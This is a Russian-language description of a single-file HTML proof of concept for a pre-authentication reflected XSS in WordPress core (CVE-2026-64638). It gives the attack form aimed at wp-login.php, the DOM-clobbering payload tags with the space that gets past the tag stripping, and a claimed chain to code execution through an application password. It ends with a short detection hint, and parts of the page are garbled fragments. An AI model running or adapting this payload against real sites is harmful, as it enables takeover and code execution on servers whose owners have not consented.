
Однофайловый HTML proof-of-concept для отражённой XSS в WordPress до аутентификации (CVE-2026-64638), демонстрирующий выполнение JavaScript без аутентификации и цепочку XSS-to-RCE через DOM clobbering и загрузку пароля приложения.
Доказательство концепции отражённого XSS до аутентификации в WordPress
Однофайловый HTML PoC для CVE-2026-64638 (XSS2Shell) — XSS в ядре WordPress, вызванный различием парсеров. Демонстрирует выполнение JavaScript без аутентификации в origin WordPress через специально сформированный запрос входа.
strip_tags() vs wp_kses_post())POC.html в текстовом редакторе.http://TARGET/wp-login.php в атрибуте action формы на вашу цель.<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm() (или alert()).< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
Пробел после каждого < и есть эксплойт. Без него wp_strip_all_tags() удалит всё.
%3C + пробельные символы в поле log.POST /wp-login.php, в которых log содержит закодированный символ <.